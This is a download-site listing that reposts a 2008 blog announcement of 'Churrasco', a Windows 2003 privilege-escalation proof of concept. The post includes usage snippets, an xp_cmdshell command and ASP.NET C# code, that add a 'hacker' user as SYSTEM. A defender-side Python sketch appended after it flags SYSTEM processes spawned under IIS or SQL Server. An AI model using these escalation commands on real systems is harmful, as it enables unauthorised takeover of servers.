Software name:  Churrasco.zip
File type:  .zip
Interface language:  English
Software type:  Foreign software
Platform:  Win2003, WinXP, Win2000, Win9X
License:  Shareware
Size:  48KB
Rating:  ★★★★☆
Release date:  2008-10-09
Official site: http://nomoreroot.blogspot.com Author: Cerrudo
Demo URL: http://nomoreroot.blogspot.com/2008/10/windows-200
Description:
(From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)

It has been a long time since the Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published, so I decided to release a PoC exploit for Win2k3 that allows executing code under the SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows
service accounts can impersonate.  Other processes (not services) that can impersonate are IIS 6 worker processes,
so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide
shared hosting services then I would recommend not allowing users to run this kind of code from ASP.


-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:

exec xp_cmdshell 'churrasco "net user /add hacker"'


-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...


You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

backup link: http://milw0rm.com/sploits/2008-Churrasco.zip

Enjoy.

Cesar.
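
A defender-side sketch for the risk described in the post above, added here and not part of the original post or the PoC: it scans process-creation records for descendants of the service hosts the post names (IIS worker, SQL Server) and marks any descendant that runs as SYSTEM while its host does not. The record layout, field names, function names and sample events are constructed for illustration.

```python
import re

# Hosts the post names as able to impersonate: IIS 6 worker, SQL Server.
SERVICE_HOSTS = {"w3wp.exe", "sqlservr.exe"}
SYSTEM = "NT AUTHORITY\\SYSTEM"

# Constructed sample events in an assumed key="value" layout (not a real log format).
SAMPLE = r'''
pid=1200 ppid=600 user="NT AUTHORITY\NETWORK SERVICE" image="w3wp.exe"
pid=1300 ppid=1200 user="NT AUTHORITY\NETWORK SERVICE" image="churrasco.exe"
pid=1310 ppid=1300 user="NT AUTHORITY\SYSTEM" image="cmd.exe"
pid=2000 ppid=600 user="NT AUTHORITY\SYSTEM" image="svchost.exe"
pid=900 ppid=600 user="CORP\sqlsvc" image="sqlservr.exe"
pid=910 ppid=900 user="CORP\sqlsvc" image="cmd.exe"
'''

FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse(line):
    """Turn one record into a dict of its key=value fields."""
    return {key: quoted or bare for key, quoted, bare in FIELD.findall(line)}

def nearest_service_host(event, procs):
    """Walk the parent chain and return the first ancestor that is a service host."""
    seen, cur = set(), procs.get(event["ppid"])
    while cur and cur["pid"] not in seen:   # 'seen' guards against PID-reuse loops
        seen.add(cur["pid"])
        if cur["image"].lower() in SERVICE_HOSTS:
            return cur
        cur = procs.get(cur["ppid"])
    return None

def find_alerts(text):
    """Return (pid, host image, reason) for every descendant of a service host."""
    procs, alerts = {}, []
    for line in text.strip().splitlines():
        event = parse(line)
        procs[event["pid"]] = event
        host = nearest_service_host(event, procs)
        if host is None:
            continue
        # Highest-signal case: host runs as a service account, descendant as SYSTEM.
        escalated = (event["user"].upper() == SYSTEM
                     and host["user"].upper() != SYSTEM)
        reason = "system-from-service" if escalated else "service-spawned-child"
        alerts.append((event["pid"], host["image"], reason))
    return alerts

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE):
        print(alert)
```
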
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved